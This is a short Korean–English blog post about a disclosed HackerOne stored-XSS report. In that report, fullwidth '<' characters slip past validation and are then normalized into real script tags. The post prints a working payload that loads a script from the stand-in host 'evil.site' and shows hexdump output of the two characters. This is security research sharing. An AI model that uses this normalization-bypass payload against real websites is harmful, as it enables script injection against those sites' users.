Normalized Stored XSS (\\xef\\xbc\\x9c => \\x3c)
해커원 보고서를 읽던 중 재미있는 XSS 취약점이 있어 공유해봅니다.
I read the hacker1 report every day. there is an interesting XSS vulnerability in the disclosure hacker1 report, so i share it.
https://hackerone.com/reports/639684
However, it is a triggered case because the site generalizes
(실제로 잘 안나오는 케이스인데, 찾은게 대단하네요)
In this blackhat 2019, there was also talk about host verification bypass using IDN Char. Normalization for IDN Char can be used as a bypass… i think, we need a more in-depth test.
I read the hacker1 report every day. there is an interesting XSS vulnerability in the disclosure hacker1 report, so i share it.
https://hackerone.com/reports/639684
Normalized XSS
=[̕h+͓.<script/src=//evil.site/poc.js>.͓̮̮ͅ=sW&͉̹̻͙̫̦̮̲͏̼̝̫́̕
What is ?
페이로드 중 <가 %3C가 아닌 IDN 문자(efbc9c)입니다. 다만 해당 사이트에서 검증 이후 <를 <로 일반화하여 처리하기 때문에 스크립트가 실행된 케이스입니다.<(\xef\xbc\x9c) is an IDN string instead of <(\x3c) in payload.However, it is a triggered case because the site generalizes
<(\xef\xbc\x9c) after verification as <(\x3c).$ cat diff.txt
<<
$ hexdump -C diff.txt
00000000 ef bc 9c 3c 0a |...<.|
00000005
Conclusion
이번 blackhat 2019에서도 IDN Char를 이용한 Host 검증 우회에 관한 이야기가 있었습니다. IDN Char가 대한 Normalization이 우회수단으로 사용될 수 있으니… 더 심층적인 테스트가 필요할 것 같습니다.(실제로 잘 안나오는 케이스인데, 찾은게 대단하네요)
In this blackhat 2019, there was also talk about host verification bypass using IDN Char. Normalization for IDN Char can be used as a bypass… i think, we need a more in-depth test.
 |
| https://i.giphy.com/b9GzDqT01QzWU.gif |
